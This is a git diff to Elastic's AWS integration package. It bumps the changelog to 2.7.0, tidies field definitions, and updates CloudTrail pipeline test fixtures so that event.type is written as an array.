diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index cd43c9264d0e..5b50f820007c 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,18 @@ # newer versions go on top +- version: "2.7.0" + changes: + - description: Add tags.yml file so that integration's dashboards and saved searches are tagged with "Security Solution" and displayed in the Security Solution UI. + type: enhancement + link: https://github.com/elastic/integrations/pull/7955 + - description: Upgrade package spec to 3.0.0. + type: enhancement + link: https://github.com/elastic/integrations/pull/7955 + - description: Fix duplicated and invalid field definitions. + type: bugfix + link: https://github.com/elastic/integrations/pull/7955 + - description: Add missing dashboard filters. + type: bugfix + link: https://github.com/elastic/integrations/pull/7955 - version: "2.6.1" changes: - description: Fix AWS API Gateway logs dashboard lens diff --git a/packages/aws/data_stream/apigateway_logs/fields/fields.yml b/packages/aws/data_stream/apigateway_logs/fields/fields.yml index 26557e301160..e846f38be587 100644 --- a/packages/aws/data_stream/apigateway_logs/fields/fields.yml +++ b/packages/aws/data_stream/apigateway_logs/fields/fields.yml @@ -82,5 +82,5 @@ The full domain name used to invoke the API. - name: stage type: keyword - description: | - The deployment stage of the API call (for example, beta or prod). \ No newline at end of file + description: |- + The deployment stage of the API call (for example, beta or prod). diff --git a/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml b/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml index 3f722e145db5..18a094804efc 100644 --- a/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml +++ b/packages/aws/data_stream/apigateway_metrics/fields/base-fields.yml @@ -17,4 +17,4 @@ - name: event.dataset type: constant_keyword description: Event dataset - value: aws.apigateway_metrics \ No newline at end of file + value: aws.apigateway_metrics diff --git a/packages/aws/data_stream/apigateway_metrics/fields/fields.yml b/packages/aws/data_stream/apigateway_metrics/fields/fields.yml index 225cd9522ab7..24429f9d4cec 100644 --- a/packages/aws/data_stream/apigateway_metrics/fields/fields.yml +++ b/packages/aws/data_stream/apigateway_metrics/fields/fields.yml @@ -23,10 +23,6 @@ type: long description: The number of server-side errors captured in a given period. metric_type: gauge - - name: Count.sum - type: long - description: The total number API requests in a given period. - metric_type: gauge - name: IntegrationLatency.avg type: long description: The time between when API Gateway relays a request to the backend and when it receives a response from the backend. @@ -106,4 +102,4 @@ fields: - name: namespace type: keyword - description: The namespace specified when query cloudwatch api. \ No newline at end of file + description: The namespace specified when query cloudwatch api. diff --git a/packages/aws/data_stream/billing/fields/package-fields.yml b/packages/aws/data_stream/billing/fields/package-fields.yml index c8cdddc0f459..79d345dc58a4 100644 --- a/packages/aws/data_stream/billing/fields/package-fields.yml +++ b/packages/aws/data_stream/billing/fields/package-fields.yml @@ -20,6 +20,7 @@ type: keyword description: > ID used to identify linked account. + - name: name type: keyword description: > diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json index 5de1a260a717..a1a070ba8c20 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-cloudtrail-digest-json.log-expected.json @@ -129,7 +129,9 @@ "kind": "event", "original": "{\"awsAccountId\":\"123456789123\",\"digestStartTime\":\"2020-09-11T18:36:49Z\",\"digestEndTime\":\"2020-09-11T19:36:49Z\",\"digestS3Bucket\":\"alice-bucket\",\"digestS3Object\":\"AWSLogs/123456789123/CloudTrail-Digest/us-west-2/2020/09/11/123456789123_CloudTrail-Digest_us-west-2_leh-ct-test_us-west-2_20200911T193649Z.json.gz\",\"digestPublicKeyFingerprint\":\"47aaa19f7eec22e9bd0b5e58cfade8cb\",\"digestSignatureAlgorithm\":\"SHA256withRSA\",\"newestEventTime\":\"2020-09-11T19:26:24Z\",\"oldestEventTime\":\"2020-09-11T18:32:04Z\",\"previousDigestS3Bucket\":\"alice-bucket\",\"previousDigestS3Object\":\"AWSLogs/123456789123/CloudTrail-Digest/us-west-2/2020/09/11/123456789123_CloudTrail-Digest_us-west-2_leh-ct-test_us-west-2_20200911T183649Z.json.gz\",\"previousDigestHashValue\":\"531914fcfa0dbacf0c9dd1475a1fdcb5dea6e85921409f3c3ec0ba39063c860\",\"previousDigestHashAlgorithm\":\"SHA-256\",\"previousDigestSignature\":\"10e0872f32fa1d299d0cc98e94d4c88a6a2eada9d9fc3ae6d53dfe8d54c7caf807072f1e1eec47efdeecfcc22483887f8fddfc954ae587fba43e7676b5547f432fa8722ba1c5baa6b233bcb528ce7c01e3748aab8f28c16c024de79da820128b4c9e5ce65e98a9c4e631687ecc89c224a11bb3df06ce441ff740e4ac9fbd41159e77f5863550118284121f193e357866fbd0463faffb56e194af196e35a7675c3bbd0a398f43159343c3f59129d6339a281a8fdb3192f3fffea9bd21dbb0a705ebfae1921f2133aab0ad29522aea6df0828c1780d3f3ed6b8270ab3ba24459916b0fbbe82fba6ff9677bafe7306e0f5edcc0f1508cdb4e36f3e3b30e653e9987\",\"logFiles\":[{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1930Z_l2pGqVS53QcGdAkp.json.gz\",\"hashValue\":\"420784a5bbc12e9ac442451e8ec1356744fdeabf4fee0d2222508db6d448139c\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:26:24Z\",\"oldestEventTime\":\"2020-09-11T19:26:24Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1915Z_TIKlbLnJ6IwUxqxw.json.gz\",\"hashValue\":\"4e1eb2a8b41d032cbb16e5449fc8f3eac304e7d43017a391b37c788c77336196\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:11:18Z\",\"oldestEventTime\":\"2020-09-11T19:11:18Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1835Z_OPJhVNodH1gY760s.json.gz\",\"hashValue\":\"2695aeb3b4c1f021fe76e0b36f5ac15e557c41c58af6eef282d77ef056210d70\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:32:04Z\",\"oldestEventTime\":\"2020-09-11T18:32:04Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1925Z_zJNGzQovyNAImZV9.json.gz\",\"hashValue\":\"45a2906f55cbfc912584e9425f8d3d8d6fabf571a45a5ecd7d2a0f4132b81689\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:21:28Z\",\"oldestEventTime\":\"2020-09-11T19:21:28Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1855Z_RqN9YzoKAJCKbejj.json.gz\",\"hashValue\":\"515cc8be750d815266b4fc799c7600765f22502d29f5bb9d5c8969ffc5ab7097\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:51:21Z\",\"oldestEventTime\":\"2020-09-11T18:51:21Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1850Z_jLldN7U8XrspES8p.json.gz\",\"hashValue\":\"18650414e79e084dff02da66253f071347f7bb5c4863279bafe7762a980f7c0b\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:46:45Z\",\"oldestEventTime\":\"2020-09-11T18:46:45Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1905Z_jBNdmg4bSGxZ3wC8.json.gz\",\"hashValue\":\"54050ec665636f1985f5b51ae43c74a58282cb2e500492a45f20a4dc1bf8a6d5\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:01:06Z\",\"oldestEventTime\":\"2020-09-11T19:01:06Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1920Z_bj5DRrmILF6jK23a.json.gz\",\"hashValue\":\"6e0d8fcbd712d3f6d1caf4a872681f4290b05ed8a8f1c9450a0a6db92ccab4d7\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:16:12Z\",\"oldestEventTime\":\"2020-09-11T19:16:12Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1900Z_6LjrkrhsLQMzCiSN.json.gz\",\"hashValue\":\"b2b0e2804d1c6b92d76eee203d7eba32d3d003e6967f175723a83ecc2d7ad4ba\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:56:05Z\",\"oldestEventTime\":\"2020-09-11T18:56:05Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1910Z_DLyqye8LaeoD204N.json.gz\",\"hashValue\":\"4397a13565a67d9ed6e57737b98eb7e61ca52bb191c9b5da0423136dfc5581c7\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T19:06:31Z\",\"oldestEventTime\":\"2020-09-11T19:06:31Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1845Z_TSDKyASOn2ejOq5n.json.gz\",\"hashValue\":\"94f09d2398632c7b0c0066ed5d56768632dd2e06ed9c80af9d0c2c5f59bd60b6\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:41:58Z\",\"oldestEventTime\":\"2020-09-11T18:41:58Z\"},{\"s3Bucket\":\"alice-bucket\",\"s3Object\":\"AWSLogs/123456789123/CloudTrail/us-west-2/2020/09/11/123456789123_CloudTrail_us-west-2_20200911T1840Z_btJydJ2t7hCRnjsN.json.gz\",\"hashValue\":\"9044f9a05d70688bc6f6048d5f8d00764ab65e132b8ffefb193b22ca4394d771\",\"hashAlgorithm\":\"SHA-256\",\"newestEventTime\":\"2020-09-11T18:37:10Z\",\"oldestEventTime\":\"2020-09-11T18:37:10Z\"}]}", "outcome": "success", - "type": "info" + "type": [ + "info" + ] }, "file": { "hash": { diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json index f1d2c80dc7ea..644d7b6fc618 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json @@ -11,12 +11,12 @@ }, "response_elements": { "keyFingerprint": "30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21", - "keyMaterial": "\u003csensitiveDataRemoved\u003e", + "keyMaterial": "", "keyName": "mykeypair" } }, "request_parameters": "{keyName=mykeypair}", - "response_elements": "{keyMaterial=\u003csensitiveDataRemoved\u003e, keyFingerprint=30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21, keyName=mykeypair}", + "response_elements": "{keyMaterial=, keyFingerprint=30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21, keyName=mykeypair}", "user_identity": { "access_key_id": "EXAMPLE_KEY_ID", "arn": "arn:aws:iam::123456789012:user/Alice", @@ -44,7 +44,7 @@ ], "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", - "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", + "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\"}}", "outcome": "success", "provider": "ec2.amazonaws.com", "type": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json index 8df0efb84e46..556ebd112062 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json @@ -59,7 +59,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"CreateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"enableLogFileValidation\":true,\"kmsKeyId\":\"\",\"isOrganizationTrail\":false},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":true,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-5149-4cf2-be99-EXAMPLE\",\"eventID\":\"EXAMPLE-d04b-4eff-833a-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json index ad1b3cb61fee..be8ef8955d24 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-trail-json.log-expected.json @@ -39,7 +39,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T20:09:51Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"DeleteTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/test-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-d44f-4a2a-966f-EXAMPLE\",\"eventID\":\"EXAMPLE-3f9d-4634-8ff1-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json index 3b40245982ba..234e6baf3a28 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-insight-json.log-expected.json @@ -71,7 +71,9 @@ "kind": "event", "original": "{\"eventVersion\":\"1.07\",\"eventTime\":\"2020-09-09T23:00:00Z\",\"awsRegion\":\"us-east-1\",\"eventID\":\"41ed77ca-d659-b45a-8e9a-74e504300007\",\"eventType\":\"AwsCloudTrailInsight\",\"recipientAccountId\":\"123456789012\",\"sharedEventID\":\"e672c2b1-e71a-4779-f96c-02da7bb30d2e\",\"insightDetails\":{\"state\":\"End\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"AttachUserPolicy\",\"insightType\":\"ApiCallRateInsight\",\"insffightContext\":{\"statistics\":{\"baseline\":{\"average\":0.0},\"insight\":{\"average\":2.0},\"insightDuration\":1,\"baselineDuration\":11459},\"attributions\":[{\"attribute\":\"userIdentityArn\",\"insight\":[{\"value\":\"arn:aws:iam::123456789012:user/Alice\",\"average\":2.0}],\"baseline\":[]},{\"attribute\":\"userAgent\",\"insight\":[{\"value\":\"console.amazonaws.com\",\"average\":2.0}],\"baseline\":[]},{\"attribute\":\"errorCode\",\"insight\":[{\"value\":\"null\",\"average\":2.0}],\"baseline\":[]}]}},\"eventCategory\":\"Insight\"}", "outcome": "success", - "type": "info" + "type": [ + "info" + ] }, "tags": [ "preserve_original_event" diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json index 22f94b3fe107..b14fc675bab2 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json @@ -44,7 +44,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StartLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-1c30-4f43-9763-EXAMPLE\",\"eventID\":\"EXAMPLE-aa78-4a84-a27f-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json index 848adf07a476..ca541c2cdb78 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json @@ -44,7 +44,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-09T16:46:16Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StopLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-869f-4fec-86f9-EXAMPLE\",\"eventID\":\"EXAMPLE-8cc3-42db-9a0d-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json index 3cb61cdf8b88..190fd43c8547 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-tls-details-json.log-expected.json @@ -55,7 +55,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:40Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UploadSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\",\"userName\":\"Alice\"},\"responseElements\":{\"sSHPublicKey\":{\"fingerprint\":\"de:ad:c0:de:de:ad:c0:de:de:ad:c0:de:de:ad:c0:de\",\"status\":\"Active\",\"uploadDate\":\"Jan 10, 2020 4:06:40 PM\",\"userName\":\"Alice\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\"}},\"requestID\":\"EXAMPLE-44b9-41cd-90f2-EXAMPLE\",\"eventID\":\"EXAMPLE-9a9d-4da4-9998-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\",\"tlsDetails\":{\"tlsVersion\":\"TLSv1.2\",\"cipherSuite\":\"ECDHE-RSA-AES128-GCM-SHA256\",\"clientProvidedHostHeader\":\"ssm.us-west-2.amazonaws.com\"}}", "outcome": "success", "provider": "iam.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json index b67a62b73485..8861e8376392 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json @@ -40,7 +40,9 @@ "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "outcome": "failure", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ @@ -145,7 +147,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T20:58:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"isMultiRegionTrail\":true,\"enableLogFileValidation\":false,\"kmsKeyId\":\"\"},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"snsTopicARN\":\"\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":false,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-f3da-42d1-84f5-EXAMPLE\",\"eventID\":\"EXAMPLE-b5e9-4846-8407-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "cloudtrail.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json index d99051d759e6..ccaeacdd84e8 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json 